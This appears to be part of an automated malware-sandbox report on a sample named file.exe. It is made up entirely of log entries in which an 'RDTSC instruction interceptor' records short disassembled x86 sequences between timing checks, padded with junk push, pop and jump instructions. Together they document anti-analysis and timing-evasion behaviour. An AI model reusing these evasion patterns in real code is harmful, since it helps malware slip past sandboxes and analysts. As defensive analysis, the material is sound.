Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A34C3 second address: 12A34E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F67787C0194h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A34E6 second address: 12A34EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A34EA second address: 12A34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A34F0 second address: 12A34F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A34F6 second address: 12A3513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 pushad 0x00000008 jp 00007F67787C0186h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3513 second address: 12A3519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A364E second address: 12A3656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3656 second address: 12A365C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EC27 second address: 124EC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FA4C second address: 124FA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FA52 second address: 124FA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FA56 second address: 124FA9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movzx edx, dx 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F6778CEBE48h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov ecx, edi 0x0000002e nop 0x0000002f push ebx 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FA9D second address: 124FAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FAA1 second address: 124FAA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3A7A second address: 12A3A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3A83 second address: 12A3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3A89 second address: 12A3A93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3A93 second address: 12A3A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3A99 second address: 12A3ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jnp 00007F67787C019Eh 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A456E second address: 12A45CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jnc 00007F6778CEBE5Dh 0x00000017 pushad 0x00000018 jp 00007F6778CEBE46h 0x0000001e jng 00007F6778CEBE46h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b popad 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ABA18 second address: 12ABA3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F67787C0186h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F67787C0191h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ABA3A second address: 12ABA3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ABA3E second address: 12ABA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F67787C018Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A9FB3 second address: 12A9FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA7E4 second address: 12AA7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAA9A second address: 12AAAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAAA0 second address: 12AAAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAAA6 second address: 12AAAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAD6A second address: 12AAD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F67787C0186h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAD75 second address: 12AAD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAD7A second address: 12AAD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAD80 second address: 12AADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE58h 0x00000009 jmp 00007F6778CEBE4Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F6778CEBE66h 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB677 second address: 12AB683 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB683 second address: 12AB6CB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnp 00007F6778CEBE52h 0x00000012 jne 00007F6778CEBE46h 0x00000018 jp 00007F6778CEBE46h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F6778CEBE4Eh 0x00000028 jbe 00007F6778CEBE58h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0426 second address: 12B0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F67787C018Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0442 second address: 12B0478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE57h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF985 second address: 12AF989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AF989 second address: 12AF98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFAEF second address: 12AFAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFAF3 second address: 12AFB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 jnc 00007F6778CEBE46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F6778CEBE46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFB13 second address: 12AFB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFECF second address: 12AFED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFED3 second address: 12AFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12AFEE2 second address: 12AFF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE59h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0029 second address: 12B002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B002D second address: 12B003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edx 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDBBF second address: 12BDBCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F67787C0186h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BBD59 second address: 12BBD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BBD5F second address: 12BBD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC655 second address: 12BC659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BC659 second address: 12BC65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA2D second address: 12BCA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA33 second address: 12BCA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA37 second address: 12BCA82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6778CEBE46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F6778CEBE53h 0x00000014 jmp 00007F6778CEBE4Ch 0x00000019 popad 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pushad 0x00000020 jg 00007F6778CEBE52h 0x00000026 jng 00007F6778CEBE46h 0x0000002c ja 00007F6778CEBE46h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA82 second address: 12BCA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BCA88 second address: 12BCAA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA61 second address: 12BDA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA67 second address: 12BDA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDA74 second address: 12BDA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB913 second address: 12BB919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BB919 second address: 12BB91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2E41 second address: 12C2E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C76FC second address: 12C7700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7700 second address: 12C7706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7706 second address: 12C7710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7307 second address: 12C7315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7315 second address: 12C731B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C731B second address: 12C7327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7327 second address: 12C732C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83B4 second address: 12D83BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83BA second address: 12D83CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F67787C019Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83CB second address: 12D83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D83D1 second address: 12D83D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB95 second address: 12DBBA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB870 second address: 12DB87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F67787C0186h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB87E second address: 12DB887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB887 second address: 12DB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00C2 second address: 12E00FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F6778CEBE46h 0x00000012 jmp 00007F6778CEBE54h 0x00000017 jp 00007F6778CEBE46h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00FA second address: 12E0124 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jl 00007F67787C0188h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F67787C0193h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0124 second address: 12E0128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E47FB second address: 12E4801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203A8A second address: 1203A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94D2 second address: 12E94D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94D7 second address: 12E94E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6778CEBE46h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E94E5 second address: 12E94EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9393 second address: 12E939D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EBF48 second address: 12EBF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F67787C0186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EBF54 second address: 12EBF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40CD second address: 12F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40D1 second address: 12F40EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE50h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F40EA second address: 12F4109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0199h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2C16 second address: 12F2C50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE58h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6778CEBE56h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2F12 second address: 12F2F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3085 second address: 12F308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F308B second address: 12F3097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3230 second address: 12F3236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3236 second address: 12F323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F323D second address: 12F3243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F33A8 second address: 12F33B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
